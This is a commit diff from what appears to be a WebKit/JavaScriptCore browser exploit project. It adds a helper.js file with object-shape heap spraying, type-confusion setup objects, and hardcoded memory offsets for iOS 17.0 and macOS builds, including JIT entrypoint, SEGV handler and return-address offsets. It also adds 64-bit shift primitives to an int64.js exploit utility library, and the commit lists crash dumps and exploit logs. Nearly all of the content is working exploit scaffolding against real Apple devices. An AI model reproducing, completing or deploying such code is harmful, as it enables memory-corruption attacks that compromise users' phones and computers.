Update

0x06060606 · Oct 18, 2023 · da2d919 · da2d919
1 parent 7e5449c
commit da2d919
Show file tree

Hide file tree

Showing 12 changed files with 550 additions and 730 deletions.
diff --git a/Crashes/com.apple.WebKit.WebContent-2023-10-18-135656.ips b/Crashes/com.apple.WebKit.WebContent-2023-10-18-135656.ips
diff --git a/Logs/Log1.txt b/Logs/Log1.txt
diff --git a/Logs/Log2.txt b/Logs/Log2.txt
diff --git a/Logs/Log3.txt b/Logs/Log3.txt
diff --git a/Logs/Log4.txt b/Logs/Log4.txt
diff --git a/Logs/Log5.txt b/Logs/Log5.txt
diff --git a/Logs/Log6.txt b/Logs/Log6.txt
diff --git a/helper.js b/helper.js
@@ -0,0 +1,97 @@
+const ITERATIONS = 100000;
+const NUM_REGS = 32;
+var offsets = {};
+var isMac = false;
+var isIphone = false;
+var buildNum = '';
+var version = '';
+
+var boxed_arr = new Function();
+boxed_arr.p1 = 1.1;
+boxed_arr[0] = {};
+var getter = new Function();
+getter.p1 = 1.1;
+getter[0] = 1.1;
+var shape = {};
+for (let i = 0; i < 14; ++i) {
+	shape['p'+i] = i;
+}
+var shapes = [];
+for (let i = 0; i < 0x1000; ++i) {
+	shapes.push({
+		...shape,
+		['z'+i]: 0x1337
+	});
+}
+
+function send(ep, data) {
+	var msg = {
+		msg: data
+	};
+	var jsonstr = JSON.stringify(msg);
+	try {
+		var xhr = new XMLHttpRequest();
+		xhr.open('POST', '/' + ep, false);
+		xhr.setRequestHeader('Content-Type', 'application/json');
+		xhr.send(jsonstr);
+	} catch (e) {
+        void(0);
+	}
+}
+
+function log(msg) {
+	send('log', msg === undefined ? 'undefined' : msg.toString());
+    document.write("<h1>" + msg + "</h1>");
+}
+
+window.onerror = function (msg, url, line) {
+	if (msg === 'Out of memory') { alert(msg); }
+	send('error', [line, msg]);
+	location.reload();
+};
+
+function SetupOffsets() {
+    isMac = navigator.userAgent.indexOf('Macintosh;') !== -1;
+    isIphone = navigator.userAgent.indexOf('iPhone;') !== -1;
+    buildNum = navigator.userAgent.split('Mobile/')[1].split(' ')[0];
+    if (isIphone)
+        version = navigator.userAgent.split('iPhone OS ')[1].split(' ')[0];
+    else if (isMac)
+        version = navigator.userAgent.split('Mac OS X ')[1].split(' ')[0];
+    else
+        version = 'unknown';
+    version = version.replace(/_/g, '.');
+    let unknown_device = false;
+    if (isMac && buildNum == '15E148') {
+        offsets.factor = 840;
+        offsets.JS_GLOBAL_OBJ_TO_GLOBAL_OBJ = 24;
+        offsets.GLOBAL_OBJ_TO_VM = 56;
+        offsets.VM_TO_TOP_CALL_FRAME = 0x9ac0;
+        offsets.JS_FUNCTION_TO_EXECUTABLE = 24;
+        offsets.EXECUTABLE_TO_JITCODE = 8;
+        offsets.JIT_CODE_TO_ENTRYPOINT = 0x148;
+    } else if (isIphone && buildNum == '15E148' && version == '17.0') {
+        offsets.factor = 87;
+        offsets.JS_GLOBAL_OBJ_TO_GLOBAL_OBJ = 24; // 24
+        offsets.GLOBAL_OBJ_TO_VM = 56;
+        // Find this offset e.g. by looking at JSC::VM::throwException in the JSC binary
+        offsets.VM_TO_TOP_CALL_FRAME = 0x99c0; // 0x99c0
+        offsets.JS_FUNCTION_TO_EXECUTABLE = 24;
+        offsets.EXECUTABLE_TO_JITCODE = 8;
+        offsets.EXECUTABLE_TO_NATIVE_FUNC = 40;
+        offsets.JIT_CODE_TO_ENTRYPOINT = 0x148;
+        offsets.JSC_BASE_TO_SEGV_HANDLER = 0x3e8b00b0;
+        offsets.JSC_BASE_TO_CATCH_EXCEPTION_RET_ADDR = 0x279f8;
+        offsets.JSC_BASE_TO_MATH_EXP = 0xbb877c;
+    } else {
+        offsets.factor = 87 + Math.floor(Math.random() * 1000);
+        offsets.JS_GLOBAL_OBJ_TO_GLOBAL_OBJ = 16;
+        offsets.GLOBAL_OBJ_TO_VM = 56;
+        offsets.VM_TO_TOP_CALL_FRAME = 0x9c00;
+        offsets.JS_FUNCTION_TO_EXECUTABLE = 24;
+        offsets.EXECUTABLE_TO_JITCODE = 8;
+        offsets.JIT_CODE_TO_ENTRYPOINT = 0x148;
+        unknown_device = true;
+    }
+	log(' ');
+}
diff --git a/int64.js b/int64.js
@@ -156,6 +156,30 @@ function Int64(v) {
         }
         return this;
     }, 2);
+
+    // this = a << b
+    this.assignShiftLeft = operation(function shiftLeft(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < b) {
+                bytes[i] = 0;
+            } else {
+                bytes[i] = a.byteAt(Sub(i, b).asInt32());
+            }
+        }
+        return this;
+    }, 2);
+
+    // this = a >> b
+    this.assignShiftRight = operation(function shiftRight(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < (8 - b)) {
+                bytes[i] = a.byteAt(Add(i, b).asInt32());
+            } else {
+                bytes[i] = 0;
+            }
+        }
+        return this;
+    }, 2);
 }
 
 // Constructs a new Int64 instance with the same bit representation as the provided double.
@@ -203,6 +227,16 @@ function RShift1(a) {
     return (new Int64()).assignRShift1(a);
 }
 
+// Return a << b
+function ShiftLeft(a, b) {
+    return (new Int64()).assignShiftLeft(a, b);
+}
+
+// Return a >> b
+function ShiftRight(a, b) {
+    return (new Int64()).assignShiftRight(a, b);
+}
+
 // Return a == b
 function Eq(a, b) {
     if(!(a instanceof Int64)) {